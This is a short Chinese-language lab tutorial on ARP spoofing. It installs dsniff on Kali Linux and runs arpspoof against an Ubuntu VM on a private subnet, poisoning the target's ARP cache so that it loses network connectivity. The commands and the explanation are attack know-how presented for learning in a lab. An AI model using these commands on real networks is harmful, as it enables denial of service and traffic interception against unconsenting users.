环境
攻击机:Kali Linux 2020.1 172.16.252.129
靶机:Ubuntu 16.04 172.16.252.138
网关:172.16.252.2
安装arpspoof
Kali Linux 2020.1 VM版本身没有arpspoof工具,需要自己安装。arpspoof是dsniff的一个组件,直接安装dsniff:
sudo apt-get install dsniff
断网攻击
命令格式:
arpspoof -i 网卡 -t 目标IP 网关
该条指令意思是:告诉目标IP,网关的MAC地址是我。污染了目标IP的arp缓存,属于单向欺骗。
(可用route -n查看网关)
本环境中:
sudo arpspoof -i eth0 -t 172.16.252.138 172.16.252.2
靶机上ping 百度原本畅通,在被攻击后就无法连通了,后面的ICMP包全丢: